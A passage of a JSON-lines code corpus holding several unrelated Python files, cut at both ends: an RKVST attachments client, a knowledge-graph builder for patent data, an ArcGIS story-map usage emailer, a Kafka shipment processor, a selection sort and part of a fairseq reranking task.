[https://app.rkvst.io/archivist/public]assets/xxxxxxx\n\n OR\n\n [https://app.rkvst.io/archivist/public]assets/xxxxxxx/events/yyyyyy\n\n where the public URL is prefixed with the schema.\n\n \"\"\"\n uuid = attachment_id.split(SEP)[1]\n if self._public:\n # the public URL for the asset or event has to be changed\n url = urlparse(identity)\n root = \"/\".join(url.path.split(SEP)[:2])\n asset_id = \"/\".join(url.path.split(SEP)[2:])\n new_url = url._replace(\n path=f\"{root}/{ASSETATTACHMENTS_SUBPATH}/{ASSETATTACHMENTS_LABEL}/{asset_id}/{uuid}\"\n )\n return new_url.geturl()\n\n return f\"{self._label}/{identity}/{uuid}\"\n\n def __params(self, params: \"dict[str, Any]|None\") -> \"dict[str, Any]\":\n params = deepcopy(params) if params else {}\n # pylint: disable=protected-access\n return _deepmerge(self._archivist.fixtures.get(ATTACHMENTS_LABEL), params)\n\n def download(\n self,\n identity: str,\n attachment_id: str,\n fd: BinaryIO,\n *,\n params: \"dict[str, Any]|None\" = None,\n ) -> \"Response\":\n \"\"\"Read attachment\n\n Reads attachment into data sink (usually a file opened for write).\n Note that returns the response as the body will be consumed by the\n fd iterator\n\n Args:\n identity (str): identity\n attachment_id (str): blobs/aaaaaaaaaaaaa\n fd (file): opened file descriptor or other file-type sink.\n params (dict): e.g. {\"allow_insecure\": \"true\"} OR {\"strict\": \"true\" }\n\n Returns:\n JSON as dict\n\n identity has one of the following 4 forms:\n\n [https://app.rkvst.io/archivist/][v2/] - if public\n assets/xxxxxxxxxxxxxxxxxxxxxxxxxx\n\n [https://app.rkvst.io/archivist/][v2/] - if public\n assets/xxxxxxxxxxxxxxxxxxxxxxxxxx/events/yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\n\n \"\"\"\n\n return self._archivist.get_file(\n self._identity(identity, attachment_id), fd, params=self.__params(params)\n )\n\n def info(\n self,\n identity: str,\n attachment_id: str,\n ) -> \"dict[str, Any]\":\n \"\"\"Read asset attachment info\n\n Reads asset attachment info\n\n Args:\n identity (str): identity\n attachment_id (str): blobs/aaaaaaaaaaaaa\n\n Returns:\n REST response\n\n identity has one of the following 4 forms:\n\n [https://app.rkvst.io/archivist/][v2/] - if public\n assets/xxxxxxxxxxxxxxxxxxxxxxxxxx\n\n [https://app.rkvst.io/archivist/][v2/] - if public\n assets/xxxxxxxxxxxxxxxxxxxxxxxxxx/events/yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\n \"\"\"\n\n return self._archivist.get(f\"{self._identity(identity, attachment_id)}/info\")\n","repo_name":"rkvst/rkvst-python","sub_path":"archivist/assetattachments.py","file_name":"assetattachments.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"62"} +{"seq_id":"43338664257","text":"__all__ = [\"PythonTestCase\"]\nimport os\nimport sys\nimport io\nimport unittest\nfrom test.utils import *\n\n\nclass PythonTestCase(TestCaseBase):\n def test_hello(self):\n \"\"\"Test calling python_hello with argument.\"\"\"\n stdout, stderr = self.call(\n [\"testnodes.python_hello\", \"john\"], has_stdout=True, has_stderr=False\n )\n\n self.assertEqual(stdout, \"hello john !\", \"wrong output\")\n\n def test_hello_stderr(self):\n \"\"\"Test calling python_hello without arguments => print argparse help.\"\"\"\n stdout, stderr = self.call(\n [\"testnodes.python_hello\"], has_stdout=False, has_stderr=True\n )\n\n self.assertIn(\"usage: hello [-h]\", stderr, \"wrong output\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"gadalang/gada-pyrunner","sub_path":"test/test_python.py","file_name":"test_python.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"27452678343","text":"import os\nimport pandas as pd\nfrom tqdm import tqdm\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom datetime import datetime\nimport random\nimport json\n\nclass KnowledgeGraphGenerator:\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n self.output_folder = None\n\n def create_output_folder(self):\n current_time = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n self.output_folder = os.path.join('output', current_time)\n os.makedirs(self.output_folder, exist_ok=True)\n print('output_path:', self.output_folder)\n\n def read_excel(self, input_file):\n # 下载中文停用词\n nltk.download('stopwords',download_dir='data')\n # 下载分词器\n nltk.download('punkt',download_dir='data')\n pd_excel = pd.read_excel(input_file)\n return pd_excel\n\n\n def generate_knowledge_graph(self, data, node_filter=None, edge_filter=None): \n G = nx.DiGraph()\n\n tfidf_vectorizer = TfidfVectorizer(max_features=self.max_features, stop_words=stopwords.words('chinese'))\n tfidf_vectorizer.fit(data['摘要']) \n\n relation_counts = {} # 添加一个字典用于记录关系数量\n\n for idx, row in tqdm(data.iterrows(), total=len(data)):\n enterprise_id = row['企业id']\n patent_title = row['专利名称']\n applicant = row['申请人']\n inventors = row['发明人']\n summary = row['摘要']\n\n if node_filter is None or node_filter(patent_title):\n G.add_node(patent_title)\n if node_filter is None or node_filter(applicant):\n G.add_node(applicant)\n if node_filter is None or node_filter(enterprise_id):\n G.add_node(enterprise_id)\n\n inventors_list = inventors.split(';')\n\n for inventor in tqdm(inventors_list, leave=False):\n if node_filter is None or node_filter(inventor):\n G.add_node(inventor)\n G.add_edge(inventor, patent_title, relation='invented')\n\n if node_filter is None or node_filter(enterprise_id) and node_filter is None or node_filter(applicant):\n G.add_edge(enterprise_id, applicant, relation='chinese_name')\n if node_filter is None or node_filter(applicant) and node_filter is None or node_filter(patent_title):\n G.add_edge(applicant, patent_title, relation='applied_for')\n\n keywords_tfidf = self.extract_keywords_with_tfidf(summary, tfidf_vectorizer)\n\n for keyword in tqdm(keywords_tfidf, leave=False):\n if node_filter is None or node_filter(keyword):\n G.add_node(keyword)\n G.add_edge(patent_title, keyword, relation='keywords')\n\n # 在这里统计关系数量\n relation_counts['invented'] = relation_counts.get('invented', 0) + 1\n relation_counts['chinese_name'] = relation_counts.get('chinese_name', 0) + 1\n relation_counts['applied_for'] = relation_counts.get('applied_for', 0) + 1\n relation_counts['keywords'] = relation_counts.get('keywords', 0) + 1\n\n print('关系数量统计:', relation_counts) # 输出关系数量统计\n\n if edge_filter is not None:\n G = G.edge_subgraph([(node1, node2) for node1, node2, data in G.edges(data=True) if edge_filter(data['relation'])])\n\n return G\n\n def extract_keywords_with_tfidf(self, text, tfidf_vectorizer):\n X = tfidf_vectorizer.transform([text])\n top_keywords = X.toarray().argsort()[0][::-1][:self.top_n_keywords] # 使用 self.top_n_keywords\n feature_names = tfidf_vectorizer.get_feature_names_out()\n return [feature_names[i] for i in top_keywords]\n\n def filter_keyword_edges(self, G):\n keyword_edges = [(node1, node2) for node1, node2, data in G.edges(data=True) if data['relation'] == 'keywords']\n G_keyword = G.edge_subgraph(keyword_edges)\n return G_keyword\n \n def select_connected_nodes_and_edges(self, G_keyword):\n connected_components = list(nx.connected_components(G_keyword.to_undirected()))\n\n if not connected_components:\n print('Error: 没有连通的节点和边,请调整参数或者检查输入数据')\n return [], []\n\n # 找到最大的连通子图\n max_connected_component = max(connected_components, key=len)\n\n # 将连通子图转换为子图对象\n max_connected_subgraph = G_keyword.subgraph(max_connected_component)\n\n # 获取最大连通子图的节点和边\n limited_nodes = list(max_connected_subgraph.nodes())\n limited_edges = list(max_connected_subgraph.edges())\n\n # 限制节点和边的数量,尽量靠近 max_nodes 和 max_edges\n limited_nodes = random.sample(limited_nodes, min(self.max_nodes, max(self.min_nodes, len(limited_nodes))))\n limited_edges = random.sample(limited_edges, min(self.max_edges, max(self.min_edges, len(limited_edges))))\n\n return limited_nodes, limited_edges\n\n\n return limited_nodes, limited_edges\n\n def generate_limited_graph(self, G_keyword, limited_edges):\n G_limited = G_keyword.edge_subgraph(limited_edges)\n return G_limited\n\n def draw_and_save_graph(self, G_limited):\n if self.layout == 'spring':\n pos = nx.spring_layout(G_limited)\n elif self.layout == 'random':\n pos = nx.random_layout(G_limited)\n elif self.layout == 'circular':\n pos = nx.circular_layout(G_limited)\n elif self.layout == 'kamada_kawai':\n pos = nx.kamada_kawai_layout(G_limited)\n else:\n pos = nx.spring_layout(G_limited) # 默认使用 spring layout\n\n plt.figure(figsize=(10, 8))\n plt.rcParams['font.sans-serif'] = ['Arial Unicode MS']\n plt.rcParams['axes.unicode_minus'] = False\n nx.draw(G_limited, pos, width=1, with_labels=True, node_size=30, font_size=12, font_color='black', font_weight='bold', node_shape='o')\n plt.savefig(os.path.join(self.output_folder, 'knowledge_graph.png'))\n print('找到连通的节点和边,保存知识图谱')\n\n def save_triplets(self, G):\n triplets = []\n for edge in G.edges(data=True):\n entity_1, entity_2, relation_data = edge\n relation = relation_data['relation']\n triplets.append({'entity_1': entity_1, 'relation': relation, 'entity_2': entity_2})\n\n triplets_df = pd.DataFrame(triplets)\n triplets_df.to_csv(os.path.join(self.output_folder, 'triplets.csv'), index=False, encoding='utf-8-sig')\n print('三元组已保存')\n\n def display_graph(self, G_limited):\n print('显示知识图谱,请手动关闭图片或者ctrl+c强制退出结束运行')\n plt.show()\n \n def run(self, node_filter=None, edge_filter=None):\n self.create_output_folder()\n for input_file in self.input_files:\n data = self.read_excel(input_file)\n G = self.generate_knowledge_graph(data, node_filter=node_filter, edge_filter=edge_filter) \n G_keyword = self.filter_keyword_edges(G)\n limited_nodes, limited_edges = self.select_connected_nodes_and_edges(G_keyword)\n G_limited = self.generate_limited_graph(G_keyword, limited_edges)\n self.draw_and_save_graph(G_limited)\n self.save_triplets(G)\n self.display_graph(G_limited)\n print('程序正常结束')\n\nif __name__ == \"__main__\":\n with open('script/config_knowledgeGraphGenerator_tfidf.json', 'r') as f:\n config = json.load(f)\n # 自定义节点和边的筛选条件\n def custom_node_filter(node):\n return len(node) < 100\n\n def custom_edge_filter(relation):\n return relation == 'keywords'\n \n graph_generator = KnowledgeGraphGenerator(**config)\n graph_generator.run(node_filter=custom_node_filter, edge_filter=custom_edge_filter)\n","repo_name":"yuriamao/indus_kg","sub_path":"script/knowledgeGraphGenerator_tfidf.py","file_name":"knowledgeGraphGenerator_tfidf.py","file_ext":"py","file_size_in_byte":8163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"73822606597","text":"from arcgis.gis import GIS\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport os\nimport traceback\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\n# Logging config\ntxtFile = open(\"C:\\\\Users\\\\Lucas.Piedrahita\\\\OneDrive - Wake County\\\\LP\\\\JupyterNotebooks\\\\story_map_views\\\\get_pros_story_map_views.txt\", \"w\")\ntxtFile.write(\"New execution of get_pros_story_map_views.py started at {0}\\n\\n\".format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")))\n\n# Define variables\nlast_day_of_last_month = datetime.now().replace(day=1) - timedelta(days=1)\nlast_month_column_name = \"{0} Views\".format(last_day_of_last_month.strftime(\"%B %Y\"))\nAGOL_USER = os.environ.get(\"AGOL_USER\")\nAGOL_PASS = os.environ.get(\"AGOL_PASS\")\nstorymap_group_id = \"264e862549e24faca0bbc2ca92bc2dec\"\nfrom_address = \"no.reply@wakegov.com\"\ntroubleshoot_email_list = [\"Lucas.Piedrahita@wakegov.com\"]\nfull_email_list = [\"Lucas.Piedrahita@wakegov.com\"]\nmsg = MIMEMultipart()\nmsg[\"From\"] = from_address\n\n# Define functions\ndef logMsg(message):\n print(message, end=\"\")\n txtFile.write(message)\n\ndef sendEmail(recipient_list, subject, body, text_type):\n logMsg(\"\\nEMAIL SENT:\\n'''\\nTo: {0}\\nSubject: {1}\\nBody:\\n{2}\\n'''\\nEnd of EMAIL SENT.\\n\".format(\", \".join(recipient_list), subject, body))\n msg[\"Subject\"] = subject\n msg[\"To\"] = \", \".join(recipient_list)\n msg.attach(MIMEText(body, text_type))\n emailbody = msg.as_string()\n # emailserver = smtplib.SMTP(\"smtprelay.wakegov.com\")\n # emailserver.sendmail(from_address, \", \".join(recipient_list), emailbody)\n # emailserver.quit()\n\ndef logError(message):\n logMsg(message)\n sendEmail(troubleshoot_email_list, \"Script get_pros_story_map_views.py failed\", message, \"plain\")\n\ndef getUsageStats(storymap):\n \"\"\" Return object of the title, id, total views since creation, \n and views during the previous month, for an input of a Web Mapping \n Application ArcGIS item, such as a storymap \"\"\"\n try:\n usage_df = storymap.usage(\"60D\")\n except IndexError:\n # This occurs for story maps younger than 60 days, where .usage(\"60D\") throws \"IndexError: list index out of range\" \n views_last_full_month = \"Storymap too young\"\n else:\n # Filter to get only the rows from the last full month\n usage_last_full_month_df = usage_df[pd.DatetimeIndex(usage_df[\"Date\"]).month == last_day_of_last_month.month]\n views_last_full_month = usage_last_full_month_df[\"Usage\"].sum()\n finally:\n usage_stats = {\n \"Tour Title\": storymap.title,\n \"Tour ID\": storymap.id,\n \"Total Views Since Creation\": storymap.numViews,\n last_month_column_name: views_last_full_month\n }\n return(usage_stats)\n\n# Run script:\ntry:\n try:\n # Connect to GIS\n gis = GIS(\"https://wake.maps.arcgis.com\", AGOL_USER, AGOL_PASS)\n logMsg(\"Connected to {0} as {1}\\n\\n\".format(gis.url, gis.properties[\"user\"][\"username\"]))\n except:\n logError(\"ERROR occurred while connecting to wake.maps.arcgis.com:\\n{0}\\n\".format(traceback.format_exc()))\n else:\n try:\n # Get storymaps from group\n storymaps_group = gis.groups.get(storymap_group_id)\n # Filter content in group to only get story maps and not maps & feature layers\n storymaps = list(filter(lambda item: (item.type == \"Web Mapping Application\"), storymaps_group.content()))\n logMsg(\"Story maps retrieved from the PROS Story Map Tours - Live group\\n\\n\")\n except:\n logError(\"ERROR occurred while retrieving story maps from the PROS Story Map Tours - Live group:\\n{0}\\n\".format(traceback.format_exc()))\n else:\n try:\n # Construct usage stats dataframe\n usage_stats_df = pd.DataFrame(columns=[\"Tour Title\", \"Tour ID\", \"Total Views Since Creation\", last_month_column_name])\n for storymap in storymaps:\n row = getUsageStats(storymap)\n usage_stats_df = usage_stats_df.append(row, ignore_index=True)\n except:\n logError(\"ERROR occurred while constructing the usage stats dataframe:\\n{0}:\\n\".format(traceback.format_exc()))\n else:\n # Check if usage stats dataframe is empty \n num_storymaps = usage_stats_df.shape[0]\n if num_storymaps < 1:\n logError(\"ERROR: The usage_stats_df FAILED VERIFICATION because it is empty: \\n{0}\\n\".format(usage_stats_df))\n else:\n # Check if the usage stats for the last month failed to be retrieved for every storymap\n usage_stats_df_failed = usage_stats_df[pd.to_numeric(usage_stats_df[last_month_column_name], errors='coerce').isnull()]\n num_storymaps_failed = usage_stats_df_failed.shape[0]\n some_failed = num_storymaps_failed > 0\n all_failed = num_storymaps_failed == num_storymaps\n if all_failed:\n logError(\"ERROR: The usage_stats_df FAILED VERIFICATION because none of the usage stats could be retrieved for the column, {0}.\\n{1}\\n\".format(last_month_column_name, usage_stats_df))\n else:\n # Send email to full email list\n logMsg(\"The usage_stats_df was verified to contain records and have at least one successfully retrieved value for the {0} column:\\n{1}\\n\".format(last_month_column_name, usage_stats_df))\n subject = \"PROS Story Map Tours Usage for {0}\".format(last_day_of_last_month.strftime(\"%B, %Y\"))\n usage_stats_df_formatted = usage_stats_df.drop(\"Tour ID\", axis=1).to_html(index=False) \n style = \"\"\"table {\n border: 1px solid #1C6EA4 !important;\n width: 620px;\n border-collapse: collapse;\n }\n table td, table th {\n border: 1px solid #AAAAAA;\n padding: 3px 3px;\n }\n table thead th {\n font-weight: bold;\n background: #458DBA;\n color: #FFFFFF;\n border-left: 2px solid #D0E4F5;\n }\n \"\"\"\n manual_check_sentence = \"\"\n if some_failed:\n # Include sentence about manually checking usage if some failed to be retrieved\n manual_check_sentence = \"If your tour is younger than 60-days-old, please email Ben Wittenberg (Ben.Wittenberg@wakegov.com) or Lucas Piedrahita (Lucas.Piedrahita@wakegov.com) and ask that they retrieve the usage stats manually.

\"\n message = \"\"\"\\\n \n \n \n \n \n

The monthly PROS story map tours usage report for {1} can be seen below:
\n
\n {2}\n
\n {3}\n This is an automated email. Do not reply directly. If you have questions about this email or report, please email {4}.
\n
\n

\n \n \n \"\"\".format(style, last_day_of_last_month.strftime(\"%B, %Y\"), usage_stats_df_formatted, manual_check_sentence, \" or \".join(troubleshoot_email_list))\n \n sendEmail(full_email_list, subject, message, \"html\")\nexcept:\n # If an unexpected/uncaught error is thrown\n logError(\"\\nScript failed unexpectedly at {0}:\\n{1}\\n\".format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\"), traceback.format_exc()))\n txtFile.close()\nelse:\n logMsg(\"\\nExecution of get_pros_story_map_views.py completed at {0}\\n\".format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")))\n txtFile.close()\n","repo_name":"LucasPiedrahita/PROS_story_maps","sub_path":"get_pros_story_map_views.py","file_name":"get_pros_story_map_views.py","file_ext":"py","file_size_in_byte":8378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"9293045004","text":"#!/usr/bin/env python3\n\nfrom kafka import KafkaProducer, KafkaConsumer\nfrom kafka.errors import KafkaError\nfrom common import get_brokers\n\nimport datetime\nimport json\nimport time\nimport uuid\n\n\nCUSTOMERS = {}\n\n\ndef generate_shipment(invoice):\n shipment = {\n \"id\": str(uuid.uuid4()),\n \"invoice_id\": invoice[\"id\"],\n \"order_id\": invoice[\"order_id\"],\n \"customer_id\": invoice[\"customer_id\"],\n \"generated_on\": datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S%z\"),\n \"destination\": CUSTOMERS[invoice[\"customer_id\"]][\"location\"],\n }\n\n return shipment\n\n\ndef update_customers(consumer):\n response = customer_consumer.poll()\n\n i = 0\n for partition, customers in response.items():\n for customer in customers:\n i += 1\n\n CUSTOMERS[customer.value[\"id\"]] = customer.value\n\n if i:\n print(\"Updated {0} customers\".format(i))\n\n\nif __name__ == \"__main__\":\n brokers = get_brokers()\n\n producer = KafkaProducer(\n bootstrap_servers=brokers,\n value_serializer=lambda m: json.dumps(m).encode(\"utf-8\"),\n )\n\n customer_consumer = KafkaConsumer(\n \"customers\",\n bootstrap_servers=brokers,\n value_deserializer=lambda m: json.loads(m.decode(\"utf-8\")),\n auto_offset_reset=\"earliest\",\n enable_auto_commit=True,\n )\n\n invoice_consumer = KafkaConsumer(\n \"invoices\",\n bootstrap_servers=brokers,\n value_deserializer=lambda m: json.loads(m.decode(\"utf-8\")),\n auto_offset_reset=\"earliest\",\n enable_auto_commit=True,\n )\n\n # Resync the entire customer topic into memory\n customer_consumer.topics()\n customer_consumer.seek_to_beginning()\n\n while not CUSTOMERS:\n update_customers(customer_consumer)\n time.sleep(0.5)\n\n # Process invoices forever\n for invoice in invoice_consumer:\n # Update Customers each time\n update_customers(customer_consumer)\n\n # Process invoices\n shipment = generate_shipment(invoice.value)\n\n producer.send(\"shipments\", shipment)\n print(shipment)\n","repo_name":"michael-robbins/aws-streaming-session","sub_path":"part-1-kafka/step-4-ship-invoices.py","file_name":"step-4-ship-invoices.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"10732203078","text":"import random\n\narr = []\nfor i in range(1001):\n arr.append(round(random.random()*100))\n\ndef selectionSort(arr):\n for i in range(len(arr)):\n temp = arr[i]\n j=i\n ind = i\n for j in range(j,len(arr),1):\n if temp > arr[j]:\n temp = arr[j]\n ind = j\n arr[ind] = arr[i]\n arr[i] = temp\n return arr\nprint(arr)\nprint(selectionSort(arr))","repo_name":"Trogers32/Python_Stack","sub_path":"python/fundamentals/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"29814783408","text":"from dataclasses import dataclass, field\n\nimport itertools\nimport logging\nimport os\n\nimport numpy as np\nimport torch\n\nfrom fairseq.logging import metrics\nfrom fairseq.data import (\n ConcatDataset,\n ConcatSentencesDataset,\n data_utils,\n Dictionary,\n IdDataset,\n indexed_dataset,\n NestedDictionaryDataset,\n NumSamplesDataset,\n NumelDataset,\n PrependTokenDataset,\n RawLabelDataset,\n RightPadDataset,\n SortDataset,\n TruncateDataset,\n TokenBlockDataset,\n)\nfrom fairseq.dataclass import ChoiceEnum, FairseqDataclass\nfrom fairseq.tasks import FairseqTask, register_task\nfrom omegaconf import II, MISSING\n\n\nEVAL_BLEU_ORDER = 4\nTARGET_METRIC_CHOICES = ChoiceEnum([\"bleu\", \"ter\"])\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass DiscriminativeRerankingNMTConfig(FairseqDataclass):\n data: str = field(default=MISSING, metadata={\"help\": \"path to data directory\"})\n num_data_splits: int = field(\n default=1, metadata={\"help\": \"total number of data splits\"}\n )\n no_shuffle: bool = field(\n default=False, metadata={\"help\": \"do not shuffle training data\"}\n )\n max_positions: int = field(\n default=512, metadata={\"help\": \"number of positional embeddings to learn\"}\n )\n include_src: bool = field(\n default=False, metadata={\"help\": \"include source sentence\"}\n )\n mt_beam: int = field(default=50, metadata={\"help\": \"beam size of input hypotheses\"})\n eval_target_metric: bool = field(\n default=False,\n metadata={\"help\": \"evaluation with the target metric during validation\"},\n )\n target_metric: TARGET_METRIC_CHOICES = field(\n default=\"bleu\", metadata={\"help\": \"name of the target metric to optimize for\"}\n )\n train_subset: str = field(\n default=II(\"dataset.train_subset\"),\n metadata={\"help\": \"data subset to use for training (e.g. train, valid, test)\"},\n )\n seed: int = field(\n default=II(\"common.seed\"),\n metadata={\"help\": \"pseudo random number generator seed\"},\n )\n\n\nclass RerankerScorer(object):\n \"\"\"Scores the target for a given (source (optional), target) input.\"\"\"\n\n def __init__(self, args, mt_beam):\n self.mt_beam = mt_beam\n\n @torch.no_grad()\n def generate(self, models, sample, **kwargs):\n \"\"\"Score a batch of translations.\"\"\"\n net_input = sample[\"net_input\"]\n\n assert len(models) == 1, \"does not support model ensemble\"\n model = models[0]\n\n bs = net_input[\"src_tokens\"].shape[0]\n assert (\n model.joint_classification == \"none\" or bs % self.mt_beam == 0\n ), f\"invalid batch size ({bs}) for joint classification with beam size ({self.mt_beam})\"\n\n model.eval()\n logits = model(**net_input)\n\n batch_out = model.sentence_forward(logits, net_input[\"src_tokens\"])\n if model.joint_classification == \"sent\":\n batch_out = model.joint_forward(\n batch_out.view(self.mt_beam, bs // self.mt_beam, -1)\n )\n scores = model.classification_forward(\n batch_out.view(bs, 1, -1)\n ) # input: B x T x C\n\n return scores\n\n\n@register_task(\n \"discriminative_reranking_nmt\", dataclass=DiscriminativeRerankingNMTConfig\n)\nclass DiscriminativeRerankingNMTTask(FairseqTask):\n \"\"\"\n Translation rerank task.\n The input can be either (src, tgt) sentence pairs or tgt sentence only.\n \"\"\"\n\n cfg: DiscriminativeRerankingNMTConfig\n\n def __init__(self, cfg: DiscriminativeRerankingNMTConfig, data_dictionary=None):\n super().__init__(cfg)\n self.dictionary = data_dictionary\n self._max_positions = cfg.max_positions\n # args.tokens_per_sample = self._max_positions\n # self.num_classes = 1 # for model\n\n @classmethod\n def load_dictionary(cls, cfg, filename):\n \"\"\"Load the dictionary from the filename\"\"\"\n dictionary = Dictionary.load(filename)\n dictionary.add_symbol(\"\") # for loading pretrained XLMR model\n\n return dictionary\n\n @classmethod\n def setup_task(cls, cfg: DiscriminativeRerankingNMTConfig, **kwargs):\n # load data dictionary (assume joint dictionary)\n data_path = cfg.data\n data_dict = cls.load_dictionary(\n cfg, os.path.join(data_path, \"input_src/dict.txt\")\n )\n\n logger.info(\"[input] src dictionary: {} types\".format(len(data_dict)))\n\n return DiscriminativeRerankingNMTTask(cfg, data_dict)\n\n def load_dataset(self, split, epoch=0, combine=False, **kwargs):\n \"\"\"Load a given dataset split (e.g., train, valid, test).\"\"\"\n if self.cfg.data.endswith(\"1\"):\n data_shard = (epoch - 1) % self.cfg.num_data_splits + 1\n data_path = self.cfg.data[:-1] + str(data_shard)\n else:\n data_path = self.cfg.data\n\n def get_path(type, data_split):\n return os.path.join(data_path, str(type), data_split)\n\n def make_dataset(type, dictionary, data_split, combine):\n split_path = get_path(type, data_split)\n\n dataset = data_utils.load_indexed_dataset(\n split_path,\n dictionary,\n combine=combine,\n )\n return dataset\n\n def load_split(data_split, metric):\n input_src = None\n if self.cfg.include_src:\n input_src = make_dataset(\n \"input_src\", self.dictionary, data_split, combine=False\n )\n assert input_src is not None, \"could not find dataset: {}\".format(\n get_path(\"input_src\", data_split)\n )\n\n input_tgt = make_dataset(\n \"input_tgt\", self.dictionary, data_split, combine=False\n )\n assert input_tgt is not None, \"could not find dataset: {}\".format(\n get_path(\"input_tgt\", data_split)\n )\n\n label_path = f\"{get_path(metric, data_split)}.{metric}\"\n assert os.path.exists(label_path), f\"could not find dataset: {label_path}\"\n\n np_labels = np.loadtxt(label_path)\n if self.cfg.target_metric == \"ter\":\n np_labels = -np_labels\n label = RawLabelDataset(np_labels)\n\n return input_src, input_tgt, label\n\n src_datasets = []\n tgt_datasets = []\n label_datasets = []\n\n if split == self.cfg.train_subset:\n for k in itertools.count():\n split_k = \"train\" + (str(k) if k > 0 else \"\")\n prefix = os.path.join(data_path, \"input_tgt\", split_k)\n if not indexed_dataset.dataset_exists(prefix, impl=None):\n if k > 0:\n break\n else:\n raise FileNotFoundError(f\"Dataset not found: {prefix}\")\n input_src, input_tgt, label = load_split(\n split_k, self.cfg.target_metric\n )\n src_datasets.append(input_src)\n tgt_datasets.append(input_tgt)\n label_datasets.append(label)\n else:\n input_src, input_tgt, label = load_split(split, self.cfg.target_metric)\n src_datasets.append(input_src)\n tgt_datasets.append(input_tgt)\n label_datasets.append(label)\n\n if len(tgt_datasets) == 1:\n input_tgt, label = tgt_datasets[0], label_datasets[0]\n if self.cfg.include_src:\n input_src = src_datasets[0]\n else:\n input_tgt = ConcatDataset(tgt_datasets)\n label = ConcatDataset(label_datasets)\n if self.cfg.include_src:\n input_src = ConcatDataset(src_datasets)\n\n input_tgt = TruncateDataset(input_tgt, self.cfg.max_positions)\n if self.cfg.include_src:\n input_src = PrependTokenDataset(input_src, self.dictionary.bos())\n input_src = TruncateDataset(input_src, self.cfg.max_positions)\n src_lengths = NumelDataset(input_src, reduce=False)\n src_tokens = ConcatSentencesDataset(input_src, input_tgt)\n else:\n src_tokens = PrependTokenDataset(input_tgt, self.dictionary.bos())\n src_lengths = NumelDataset(src_tokens, reduce=False)\n\n dataset = {\n \"id\": IdDataset(),\n \"net_input\": {\n \"src_tokens\": RightPadDataset(\n src_tokens,\n pad_idx=self.source_dictionary.pad(),\n ),\n \"src_lengths\": src_lengths,\n },\n \"nsentences\": NumSamplesDataset(),\n \"ntokens\": NumelDataset(src_tokens, reduce=True),\n \"target\": label,\n }\n\n dataset = NestedDictionaryDataset(\n dataset,\n sizes=[src_tokens.sizes],\n )\n\n assert (\n len(dataset) % self.cfg.mt_beam == 0\n ), \"dataset size (%d) is not a multiple of beam size (%d)\" % (\n len(dataset),\n self.cfg.mt_beam,\n )\n\n # no need to shuffle valid/test sets\n if not self.cfg.no_shuffle and split == self.cfg.train_subset:\n\n # need to keep all hypothese together\n start_idx = np.arange(0, len(dataset), self.cfg.mt_beam)\n with data_utils.numpy_seed(self.cfg.seed + epoch):\n np.random.shuffle(start_idx)\n\n idx = np.arange(0, self.cfg.mt_beam)\n shuffle = np.tile(idx, (len(start_idx), 1)).reshape(-1) + np.tile(\n start_idx, (self.cfg.mt_beam, 1)\n ).transpose().reshape(-1)\n\n dataset = SortDataset(\n dataset,\n sort_order=[shuffle],\n )\n\n logger.info(f\"Loaded {split} with #samples: {len(dataset)}\")\n\n self.datasets[split] = dataset\n return self.datasets[split]\n\n def build_dataset_for_inference(self, src_tokens, src_lengths, **kwargs):\n assert not self.cfg.include_src or len(src_tokens[0]) == 2\n input_src = None\n if self.cfg.include_src:\n input_src = TokenBlockDataset(\n [t[0] for t in src_tokens],\n [l[0] for l in src_lengths],\n block_size=None, # ignored for \"eos\" break mode\n pad=self.source_dictionary.pad(),\n eos=self.source_dictionary.eos(),\n break_mode=\"eos\",\n )\n input_src = PrependTokenDataset(input_src, self.dictionary.bos())\n input_src = TruncateDataset(input_src, self.cfg.max_positions)\n\n input_tgt = TokenBlockDataset(\n [t[-1] for t in src_tokens],\n [l[-1] for l in src_lengths],\n block_size=None, # ignored for \"eos\" break mode\n pad=self.source_dictionary.pad(),\n eos=self.source_dictionary.eos(),\n break_mode=\"eos\",\n )\n input_tgt = TruncateDataset(input_tgt, self.cfg.max_positions)\n if self.cfg.include_src:\n src_tokens = ConcatSentencesDataset(input_src, input_tgt)\n src_lengths = NumelDataset(input_src, reduce=False)\n else:\n input_tgt = PrependTokenDataset(input_tgt, self.dictionary.bos())\n src_tokens = input_tgt\n src_lengths = NumelDataset(src_tokens, reduce=False)\n\n dataset = {\n \"id\": IdDataset(),\n \"net_input\": {\n \"src_tokens\": RightPadDataset(\n src_tokens,\n pad_idx=self.source_dictionary.pad(),\n ),\n \"src_lengths\": src_lengths,\n },\n \"nsentences\": NumSamplesDataset(),\n \"ntokens\": NumelDataset(src_tokens, reduce=True),\n }\n\n return NestedDictionaryDataset(\n dataset,\n sizes=[src_tokens.sizes],\n )\n\n def build_model(self, cfg: FairseqDataclass, from_checkpoint: bool = False):\n return super().build_model(cfg)\n\n def build_generator(self, args):\n return RerankerScorer(args, mt_beam=self.cfg.mt_beam)\n\n def max_positions(self):\n return self._max_positions\n\n @property\n def 